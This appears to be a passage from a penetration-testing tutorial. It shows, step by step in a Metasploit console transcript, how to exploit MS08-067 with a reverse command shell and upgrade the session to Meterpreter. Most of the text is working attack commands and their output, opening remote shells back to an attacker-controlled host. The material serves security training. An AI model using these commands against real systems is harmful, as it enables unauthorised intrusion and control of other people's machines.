One of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter payload once the system has been exploited, by issuing the sessions -u command. This is useful if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks into the network. Let’s look at a quick example from start to finish using MS08-067 with a reverse command shell as the payload, and upgrade it to a Meterpreter shell.
root@bt:/opt/framework3/msf3#msfconsolemsf >search ms08_067[*] Searching loaded modules for pattern 'ms08_067'... Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption msf >use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) >set PAYLOAD windows/shell/reverse_tcppayload => windows/shell/reverse_tcp msf exploit(ms08_067_netapi) >set TARGET 3target => 3 msf exploit(ms08_067_netapi) >setg LHOST 192.168.33.129LHOST => 192.168.33.129 msf exploit(ms08_067_netapi) >
setg LPORT 8080LPORT => 8080 msf exploit(ms08_067_netapi) >exploit -z[*] Started reverse handler on 192.168.33.129:8080 [*] Triggering the vulnerability... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.33.129:8080 -> 192.168.33.130:1032) [*] Session 1 created in the background. msf exploit(ms08_067_netapi) >
sessions -u 1[*] Started reverse handler on 192.168.33.129:8080 [*] Starting the payload handler... [*] Command Stager progress - 3.16% done (1694/53587 bytes) [*] Command Stager progress - 6.32% done (3388/53587 bytes)
. . . SNIP . . .[*] Command Stager progress - 97.99% done (52510/53587 bytes) [*] Sending stage (748032 bytes) msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.33.129:8080 -> 192.168.33.130:1044) msf exploit(ms08_067_netapi) >sessions -i 2[*] Starting interaction with 2... meterpreter >
At we issue the setg command for LHOST and LPORT, which is required in order for the sessions -u 1 to upgrade to Meterpreter at . (The setg command sets the LPORT and LHOST globally in Metasploit, not just for this exploit.)
Notice at that when we exploit the system we issue the exploit -z command, which will not interact with the session once the target has been exploited. If you had already executed the exploit command at this point, you could simply press ctrl-Z and run the session in the background.